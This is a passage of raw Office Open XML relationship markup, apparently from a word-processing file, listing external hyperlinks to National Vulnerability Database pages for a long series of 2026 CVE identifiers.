TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 